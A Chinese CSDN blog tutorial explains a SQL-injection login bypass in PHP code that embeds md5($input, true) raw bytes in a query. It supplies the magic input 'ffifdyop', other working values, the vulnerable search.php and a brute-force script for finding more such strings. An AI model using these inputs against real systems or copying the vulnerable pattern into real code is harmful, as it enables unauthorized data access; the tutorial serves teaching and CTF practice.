MD5 绕过第三式:ffifdyop

已于 2023-09-30 18:12:54 修改
阅读量446 收藏
点赞数 1
分类专栏: 安全 数据库 文章标签: MD5 绕过 ffifdyop SQL 注入 MySQL ASCII PHP
于 2023-09-30 18:11:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44879989/article/details/133363370
版权

文章目录

参考

项目描述
搜索引擎BingGoogle
AI 大模型文心一言通义千问讯飞星火认知大模型ChatGPT
PHP 手册PHP Manual
MySQL Documentationhttps://dev.mysql.com/doc/
菜鸟教程MySQL 教程
C 语言中文网PHP正则表达式,看这一篇就够了

环境

项目描述
PHP8.0.0
SQL Version8.0.33 MySQL Community Server - GPL

推荐阅读

项目描述
CSDNMD5 绕过第一式:弱比较绕过
CSDNMD5 绕过第二式:数组绕过

雾现

两个 PHP 文件

db_info.php

<?php


// 定义与数据库相关的常量
# 提供运行 MySQL 服务的服务器地址
const HOSTNAME = 'localhost';
# 登录 MySQl 服务器使用的用户名
const USERNAME = 'root';
# 登录用户 root 的密码
const PASSWORD = '123456';
# 连接 MySQL 后需要使用到的数据库
const DATABASE = 'db_test';

search.php

<?php


# 包含文件以获取登录服务器所需要使用到的常量
include_once('./db_info.php');

# 模拟用户输入
$user_input = 'User Input';

# 尝试连接数据库,若连接失败则立即终止程序
$db = mysqli_connect(HOSTNAME, USERNAME, PASSWORD, DATABASE) or die();

# 构造 SQL 查询语句
$qs = "SELECT * FROM data WHERE username = 'admin' and password ='" . md5($user_input, true) . "';";
# 向 MySQL 发起查询操作
$result = mysqli_query($db, $qs);

# 向 MySQL 获取查询结果
while ($content = mysqli_fetch_assoc($result)) {
    var_dump($content);
}

上述 PHP 代码分别是 db_info.phpsearch.php 文件中的内容。其中,db_info.php 文件保存了通过 PHP 插件 mysqli 连接 MySQL 所需要的信息。而 test.php 则尝试连接 MySQL,并在连接后向 MySQL 发起查询以获取所需要的数据。

表结构

在本示例中,我们使用到的数据库是 db_test,使用到的表是 data

在终端中使用如下语句以获取表 data 的创建信息:

SHOW CREATE TABLE data\G

得到如下内容:

*************************** 1. row ***************************
       Table: data
Create Table: CREATE TABLE `data` (
  `username` varchar(25) DEFAULT NULL,
  `password` varbinary(16) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci
1 row in set (0.00 sec)

由输出可知,data 中包含两个字段,分别为 usernamepasswordusername 使用 varchar(25) 作为其数据类型,这意味着 username 字段至多可以接受 25字符 作为该字段的值。而 password 使用 binary(16) 作为其数据类型,着意味着 password 字段至多可以接收 16 字节的 二进制数据 作为该字段的值。

尝试查询 data 表中的所有数据

在终端中执行如下语句:

SELECT * FROM data;

得到如下结果:

+----------+------------------------------------+
| username | password                           |
+----------+------------------------------------+
| admin    | 0x1E6947AC7FB3A9529A9726EB692C8CC5 |
| RedHeart | 0xDC04139732D12110E885BA1C703B3C42 |
+----------+------------------------------------+
2 rows in set (0.00 sec)

分析

search.php 文件中,我们的重点是如下代码片段。

# 构造 SQL 查询语句
$qs = "SELECT * FROM data WHERE username = 'admin' and password ='" . md5($user_input, true) . "';";
# 向 MySQL 发起查询操作
$result = mysqli_query($db, $qs);

search.php 尝试向 MySQL 发起查询,向 data 表中查询 username 字段为 admin 以及 passwordmd5($user_input, true) 函数的二进制加密结果的行记录。其中,$user_input 变量用于模拟用户的输入。我们的目标便是 通过构造合适的用户输入,使得查询操作能够获取到 data 表中的所有内容

注:

在现代科技的攻势下,MD5 的哈希结果已经能够在 数小时内找到能够产生哈希碰撞的另一原始数据值🧙🏻‍♂️,所以请使用安全系数更高的哈希函数来加密密码吧。

雾散

ASCII 编码

ASCII(American Standard Code for Information Interchange) 是一种字符编码标准,用于 将文本字符映射到数值ASCII 最早🤞在计算机领域中广泛使用,它定义了 128 个不同的字符,包括 控制字符(如换行和回车) 以及 可打印字符(如字母、数字、标点符号等)。ASCII 定义的每个字符都被分配了一个 唯一的整数值,范围从 0127

注:

世界上存在许多的编码方案,但这些方案大多是 基于 ASCII 编码进行扩展的🌹,因此 ASCII 编码也被认为是 字符编码的基础

二进制数据到 ASCII 文本的转化

PHP 中的 md5() 函数在第二个参数为 true 时会将 MD5 哈希结果以二进制数据 的形式进行返回,因 MD5 函数的返回值类型为 字符串,故在返回结果前,二进制数据将使用 ASCII 进行 解码(二进制数据到文本字符的转化)。对此,请参考如下示例:

<?php


var_dump(md5('Hello World', true));

执行效果

其中:

  1. 由四边形包裹的问号
    一个字节能够表示的十进制数的范围为 0~255,而 ASCII 中的字符的编号范围为 0~127,两者的范围不对等。因此,当一个字节所表示的十进制数在 128~255 时,该字节将使用 四边形包裹的问号(不同的环境可能有不同的表现方式) 表示。
  2. ASCII 字符
    字节的 十进制数表示0~127 时,均使用 ASCII 中相应的字符进行表示。
  3. 小而多(容量大,包含几个字符)的方块字
    ASCII 字符中存在一部分 控制字符,这些字符起着控制作用,由于 没有这些字符的具体表现形式,所以使用 表示这些控制字符的英文缩写的方块字 来展现这些字符。
  4. 在上述内容中存在一个换行,这是由于某个字节转化为 ASCII 字符后得到了 可打印字符——换行符所产生的效果。

绕过原理

二进制数据会被转化为 ASCII 字符✨,如果某一个字符串在经过 MD5 哈希后,得到的二进制数据转化为 ASCII 文本后恰能够与周围的文本形成 SQL 注入语句,那么我们就能够绕过限制,成功发起攻击😈。

ffifdyop

在此类绕过实践中,ffifdyop 就是一个得力的工具。对此,请参考如下示例:

<?php


var_dump(md5('ffifdyop', true));

执行效果

string(16) "'or'6�]��!r,��b"

ffifdyop 经过两次转化后得到的结果是 'or'6�]��!r,��b。位于 or 两侧的单引号可以用于闭合两端的单引号,使得 or 不再被 MySQL 认为是字符串,而是一个关键字,发挥着 逻辑或运算符 的作用。

绕过

尝试将 search.php 文件中的 $user_input 赋值为 ffifdyop

<?php


# 包含文件以获取登录服务器所需要使用到的常量
include_once('./db_info.php');

# 模拟用户输入
$user_input = 'ffifdyop';

# 尝试连接数据库,若连接失败则立即终止程序
$db = mysqli_connect(HOSTNAME, USERNAME, PASSWORD, DATABASE) or die();

# 构造 SQL 查询语句
$qs = "SELECT * FROM data WHERE username = 'admin' and password ='" . md5($user_input, true) . "';";
# 输出构造结果,便于分析
var_dump($qs);
# 向 MySQL 发起查询操作
$result = mysqli_query($db, $qs);


# 向 MySQL 获取查询结果
while ($content = mysqli_fetch_assoc($result)) {
    var_dump($content);
}

执行效果

由于 WHERE 关键字后的条件语句 username = '' and password =''or'6�]��!r,��b' 对于表中的每一个字段都为 true,因此我们成功的实现了 SQL 注入,获得了 data 表中的所有数据。

string(77) "SELECT * FROM data WHERE username = 'admin' and password =''or'6�]��!r,��b';"
array(2) {
  ["username"]=>
  string(5) "admin"
  ["password"]=>
  string(16) "iG���R��&�i,��"
}
array(2) {
  ["username"]=>
  string(8) "RedHeart"
  ["password"]=>
  string(16) "��2�!腺p;<B"
}

ffifdyop 的批量化生产

批量化生产

除了 ffifdyop 外,还存在许多类似的文本。对此,请参考如下示例:

<?php


var_dump(md5(`16529176061`, true));
var_dump(md5(5207660362, true));
var_dump(md5('ffifdyop', true));

执行效果

string(16) "'OR'1q1uMp$��7"
string(16) "@;-V'or'2�9D��"
string(16) "'or'6�]��!r,��b"

要获得更多像 ffifdyop 这样的文本仅需要编写适当的程序。这个程序需要 产生许多文本并在随后对这些文本进行 MD5 哈希及 ASCII 的转化,最后设计从中挑选符合某一规则的文本 即可。至于需要符合的某一规则,可以是包含 ' or ' 的文本👹。

注意事项

细节
一字之差

在继续讲解前,请先观察如下两条 SQL 语句及其查询结果:

mysql> SELECT * FROM data WHERE username = 'admin' and password = 'Random' or '1Hello';
+----------+------------------------------------+
| username | password                           |
+----------+------------------------------------+
| admin    | 0x1E6947AC7FB3A9529A9726EB692C8CC5 |
| RedHeart | 0xDC04139732D12110E885BA1C703B3C42 |
+----------+------------------------------------+
2 rows in set, 1 warning (0.00 sec)

mysql> SELECT * FROM data WHERE username = 'admin' and password = 'Random' or 'Hello';
Empty set, 1 warning (0.00 sec)

两条 SQL 查询语句 仅仅存在一字之差。使用 '1Hello' 却成功实现了 SQL注入,而使用 'Hello' 却什么也没有获得。

运算符优先级

在 MySQL 中,运算符之间是存在优先级的。在进行运算过程中,运算符优先级更高的运算优先进行。在同时存在 =andor 的运算中,MySQL 将优先处理 =,其次 and,最后 or

username = 'admin' and password = 'Random' or 'Hello'

在上述运算中,username = 'admin'password = 'Random' 将被优先运算,但由于字段与相应字段值均不相符,故两者的运算结果均为 falsefalse and false 的结果也是 false。最后,false or 'Hello' 该如何进行?

false or 'Hello' 中,'Hello' 将被转化为布尔值。依据 MySQL 相关的转化规则,以 非零数值开头的字符串 都将被转化为 true,其他字符串则被转化为 false。于是一字之差决定了成败🧐。

实际需要遵守的规则

因此在 ffifdyop 的批量化生产中,挑选的规则不是只是包含 ' or ' 的文本,而应该是:

包含 ' or ' 的文本,且 第二个引号的右侧的第一个字符需要是数字字符(0 ~ 9)

生产机器

依据 类 ffifdyop 文本 的挑选规则,我们编写了如下 PHP 脚本:

<?php


const MAX_EDGE = 9999999999;

for ($i=0; $i<MAX_EDGE; $i++) {
    if (preg_match("/'\s*or\s*'\d+/i", md5($i, true))) {
        print("\n" . $i . "\n");
    } else {
        # pass
    }
}

在上述文本中,我们尝试通过使用循环变量 $i 作为可能的 ffifdyop 文本。在每一轮循环中,我们都将通过 preg_match() 提供的 正则表达式 来判断 $iMD5 哈希结果值的 ASCII 形式 中是否符合 规定的文本模式,若符合则将其输出至终端中。

BinaryMoon
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
md5(“ffifdyop“,true)
lonmar的博客
10-24 765
题目链接 http://web.jarvisoj.com:32772/ 抓包可以发现Hint select * from 'admin' where password=md5($pass,true) md5() 加入参数为true则会以字符串形显示 比较特殊的字符串–ffifdyop 所以 select * from ‘admin’ where password=md5(‘ffifdyop’,true) 所以直接输入 ffifdyop 就可以通过,万能密码 ...
[BJDCTF2020]Easy MD51 解题记录
kindyyy的博客
10-12 253
大概了解了一下这个的意思,就是我们要找一个16位的MD5字符串里面含有。打开题目,发现什么都没有,猜测或许和sql注入有关,先传一个参数看一看。提交了参数1之后,发现url上面多了一个password的参数限制。
ffifdyop绕过MD5进行sql注入
东隅的博客
07-16 1012
ffifdyop绕过MD5进行sql注入
ffifdyop
m0_52432374的博客
04-11 911
ffifdyop——绕过中一个奇妙的字符串 ffifdyop 经过md5加密后:276f722736c95d99e921722cf9ed621c 再转换为字符串:'or’6<乱码> 即 'or’66�]��!r,��b 用途: select * from admin where password=’‘or’6<乱码>’ 就相当于select * from admin where password=’'or 1 实现sql注入 题目:实验吧——md5绕过 链接:http://c
Web 渗透题(三)
0xac001d09
05-20 835
[BJDCTF2020]Easy MD5ffifdyop+弱类型比较 步骤一:ffifdyop 字符串 提交两次没反应,上 burp GET /leveldo4.php?password=123 HTTP/1.1 Host: 3b74d3ab-4e56-4c99-b522-35a4985ebe8f.node4.buuoj.cn:81 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7
绕过MD5ffifdyop绕过中一个奇妙的字符串
qq_53099119的博客
03-26 241
就相当于select * from admin where password=''or 1 实现sql注入。链接:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php。总之,相当于 select * from admin where password=''or ture。select * from admin where password='‘or’6’再转换为字符串:'or’6 即。题目:实验吧——md5绕过。查看网页源代码 发现提示。
[BJDCTF2020]Easy MD5 1
m0_73734159的博客
11-11 208
PHP中,数组作为参数传递时会被hash计算,但是MD5函数只能接受字符串类型的参数,因此当数组作为参数传递时,会提示MD5()函数需要一个string类型的参数。而 Mysql 刚好又会把 hex 转成 ascii 解释,因此拼接之后的形是select * from ‘admin’ where password=’’ or ‘6xxxxx’,等价于 or 一个永真,因此相当于万能密码,可以绕过md5()函数。所以说看到这段内置SQL语句,直接使用ffifdyop绕过即可,这就是它的原理。
md5file-with-progressbar:带有进度条的md5文件
04-28
带有进度条的MD5文件要求节点:^ 6.0.0安装npm install --save md5file-with-progressbar用法const md5 = require('md5file-with-progressbar');let instance = new md5('/Users/anybody/Downloads/bigfile.zip');...
md5tools_md5_md5tools_
09-30
3. **批量处理**:MD5助手支持同时处理多个文件,极大地提高了工作效率,特别是在需要对比大量文件MD5值的场景下。 4. **拖放功能**:用户可以通过简单的拖放操作将文件添加到软件中,这种直观的操作方使得软件...
md5加密,原生js使用md5加密
03-04
虽然原生JavaScript不提供MD5功能,但可以借助第三方库。例如,`jquery.md5.js`是一个小型的jQuery插件,它封装了MD5算法,可以方便地在JavaScript中使用。引入该库后,你可以使用`$.md5()`方法对字符串进行MD5加密...
代码备份:c 语言 - md5 转换代码
10-23
md5.h 末尾,有函数使用的案例 内容概要: 加密数据、解密数据、编码数据、解码数据~ 代码内容,包含: md5.h md5.c 适合人群: 使用 c 语言编码的人群,需要编码、需要解码、需要加密、需要解密
md5-optimisation:使用x86汇编的最快MD5实现
05-28
MD5优化技巧:击败OpenSSL的手工调试程序集 MD5是一种相对较旧的加密哈希算法,已经(并且仍在)被广泛使用。 因此,目前流行的实现已得到很好的优化。 OpenSSL对其(x86)实现使用手动调整的程序集,这可能是目前...
MD5加密后的SQL 注入
热门推荐
greyfreedom的专栏
05-19 1万+
转自:http://www.joychou.org/index.php/web/SQL-injection-with-raw-MD5-hashes.html?utm_source=tuicool 今天看到 $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 这样一个sql,其实可以注入。 思路比较
ffifdyop——绕过中一个奇妙的字符串
生活·代码_这里是青_分享快乐
11-13 501
根据师傅们的博客总结如下: ffifdyop 经过md5加密后:276f722736c95d99e921722cf9ed621c 再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b 用途: select * from admin where password=''or'6<乱码>' 就相当于select * from admin ...
[BJDCTF2020]Easy MD5(构造ffifdyop,POST传参)
weixin_44110537的博客
09-21 218
题目提示是md5. 传入的参数会通过md5哈希然后转成ascII码再进行查询. 于是尝试构成万能密码.‘or’XXXXXX 构造的字符串为:ffifdyop 有一个’./levels91.php’目录,访问他. 要求a!=b 且他们的md5值是相等的. 正常来说这几乎可以说是不可能的.但是这里有个漏洞,就是如果传参的类型错误,他们返回的都是false.那么他们也是相等的.于是传递两个数组类型. a[]和b[],这里还是GET方. 又得到一个php文件,继续访问他. 发现这里传回来的数据是一段代码,
BUUCTF——[BJDCTF2020]Easy MD5 1
小白一枚多多关注的博客
04-11 5767
前言 这道题在解答之前需要先有个知识储备,其中需要得知识储备是php语言以及md5加密得内容,并且为了方便最好再精通一门语言好用来编写脚本 知识储备 php中是一个弱语言,它是一个服务器端得语言(也叫后端语言),属于web端得开发语言,和java差不多,但也不完全一样,在php中有一个函数叫做md5函数,这个函数得基本格是: <?php $a = '123'; echo md5($a,true); ?> 这里就要着重的讲述一下echo md5($a,true)了,这里可以将括号中得tru
md5绕过_ffifdyop
sinat_41380394的博客
08-07 2628
地址: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 源码: &lt;!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $...
一个绕过MD5SQL注入技巧
hi_xpf的博客
04-12 5111
http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 隐藏在注释里的提示: $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=my...
$md5 == md5($md5)怎么绕过
最新发布
04-03
对于给定的表达$md5 == md5($md5),它是一个简单的条件判断语句,用于比较变量$md5MD5哈希值是否与其自身的MD5哈希值相等。在正常情况下,这个条件判断应该始终返回true。 然而,如果你想要绕过这个条件判断,可能有以下几种方法: 1. 修改$md5的值:你可以尝试修改$md5的值,使其与其MD5哈希值不相等。这可以通过手动计算不同的字符串的MD5哈希值来实现。 2. 修改MD5算法:你可以尝试修改MD5算法的实现,以使其在计算$md5MD5哈希值时产生不同的结果。这需要对MD5算法有深入的了解和修改能力。 3. 利用哈希碰撞:哈希碰撞是指找到两个不同的输入,但它们的哈希值相同。你可以尝试找到一个与$md5不同但具有相同MD5哈希值的输入。然而,找到这样的碰撞是非常困难的,并且需要大量的计算资源和时间。 请注意,绕过条件判断是一种不推荐的行为,可能会违反系统的安全性和完整性。在实际应用中,应该遵循安全编码的最佳实践,确保数据的完整性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BinaryMoon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值